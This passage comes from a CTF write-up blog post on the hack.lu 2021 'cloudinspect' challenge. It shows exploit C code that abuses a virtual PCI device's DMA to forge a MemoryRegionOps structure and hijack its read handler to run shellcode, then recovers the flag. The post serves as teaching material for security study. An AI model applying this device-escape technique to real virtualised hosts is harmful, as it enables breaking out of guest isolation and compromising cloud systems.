class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, -(addr_obj - ops_struct));</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, <span class="keyword">sizeof</span>(<span class="keyword">struct</span> MemoryRegionOps));</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, dmabuf_phys_addr);</span><br><span class="line">ioread(CLOUDINSPECT_MMIO_OFFSET_TRIGGER);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Write it in the fake struct</span></span><br><span class="line"><span class="built_in">memcpy</span>(&amp;fake_ops, dmabuf, <span class="keyword">sizeof</span>(<span class="keyword">struct</span> MemoryRegionOps));</span><br><span class="line">fake_ops.read = (leak_rwx + <span class="number">0x1000</span>); </span><br><span class="line"><span class="comment">// Edit the handler we want to hook to make it point to the shellcode at leak_rwx + 0x1000</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] fake_ops.read = %lx\n&quot;</span>, leak_rwx + <span class="number">0x1000</span>);</span><br><span class="line"><span class="built_in">memcpy</span>(dmabuf, &amp;fake_ops, <span class="keyword">sizeof</span>(<span class="keyword">struct</span> MemoryRegionOps));</span><br><span class="line"></span><br><span class="line"><span class="comment">// patch it and write it @ leak_rwx + 0x2000</span></span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, leak_rwx - addr_obj + <span class="number">0x2000</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, <span class="keyword">sizeof</span>(<span class="keyword">struct</span> MemoryRegionOps));</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, <span class="number">0x300</span>);</span><br></pre></td></tr></table></figure>

<h3 id="Hook-mmio-ops-PROFIT"><a href="#Hook-mmio-ops-PROFIT" class="headerlink" title="Hook mmio.ops + PROFIT"></a>Hook mmio.ops + PROFIT</h3><p>We just have to replace the original <code>CoudInspect.mmio.ops</code> pointer to a pointer to the <code>fake_ops</code> structure.<br>Then, next time we send a read request, the shellcode will be executed! And we will just need to retablish the original <code>CoudInspect.mmio.ops</code> pointer to read the flag at <code>leak_rwx+0x5000</code>! Which gives:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">write_dmabuf(<span class="number">-0xd0</span>, leak_rwx+<span class="number">0x2000</span>);</span><br><span class="line"><span class="comment">// Set the pointer to the MemoryRegionOps to the fake MemoryRegionOps	</span></span><br><span class="line"></span><br><span class="line">ioread(<span class="number">0x37</span>); <span class="comment">// trigger the read handler we control, then the shellcode is </span></span><br><span class="line"><span class="comment">// executed and the flag is written @ leak_rwx + 0x5000[enter link description here](cloudinspect)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] CloudInspectState.mmio.ops.read () =&gt; jmp @ %lx\n&quot;</span>, leak_rwx + <span class="number">0x1000</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">char</span> flag[<span class="number">0x30</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="comment">// So we just have to read the flag @ leak_rwx + 0x5000</span></span><br><span class="line"></span><br><span class="line">write_dmabuf(<span class="number">-0xd0</span>, ops_struct);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] CloudInspectState.mmio.ops = original ops\n&quot;</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[*] Reading the flag @ %lx\n&quot;</span>, leak_rwx + <span class="number">0x5000</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, leak_rwx - addr_obj + <span class="number">0x5000</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, <span class="number">0x30</span>);</span><br><span class="line">iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, dmabuf_phys_addr);</span><br><span class="line"><span class="keyword">if</span> (!ioread(CLOUDINSPECT_MMIO_OFFSET_TRIGGER)) &#123;</span><br><span class="line">		perror(<span class="string">&quot;Failed to read the flag\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">memcpy</span>(flag, dmabuf, <span class="number">0x30</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;flag: %s\n&quot;</span>, flag);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// adresses are different because here is another execution on the remote challenge</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">b&#x27;[*] CloudInspectState.mmio.ops.read () =&gt; jmp @ 7fe3dc001000\r\r\n&#x27;</span></span><br><span class="line"><span class="comment">b&#x27;[*] CloudInspectState.mmio.ops = original ops\r\r\n&#x27;</span></span><br><span class="line"><span class="comment">b&#x27;[*] Reading the flag @ 7fe3dc005000\r\r\n&#x27;</span></span><br><span class="line"><span class="comment">b&#x27;flag: flag&#123;cloudinspect_inspects_your_cloud_0107&#125;\r\r\n&#x27;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">flag: flag&#123;cloudinspect_inspects_your_cloud_0107&#125;</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p>Thanks for the organizers for this awesome event! The other pwn challenges look like very interesting as well!<br>You can the final exploit <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/blob/master/2021/hack.lu/pwn/cloudinspect/remote.c">here</a>.</p>
<h2 id="Resources"><a href="#Resources" class="headerlink" title="Resources"></a>Resources</h2><ul>
<li><a target="_blank" rel="noopener" href="https://tldp.org/LDP/tlk/dd/pci.html">Interesting article about PCI devices</a></li>
<li><a target="_blank" rel="noopener" href="https://www.kernel.org/doc/Documentation/filesystems/sysfs-pci.txt">Linux kernel PCI documentation</a></li>
<li><a target="_blank" rel="noopener" href="https://www.kernel.org/doc/Documentation/vm/pagemap.txt">Linux kernel pagemap documentation</a></li>
</ul>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/safe/"
      title="[TRACS 2021 - RE] Coffre"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [TRACS 2021 - RE] Coffre
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/posts/pwnasis/"
      title="[ASIS CTF QUALS 2021 - pwn] abbr & justpwnit"
     >

    <p class="title-text">
      
        [ASIS CTF QUALS 2021 - pwn] abbr &amp; justpwnit
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
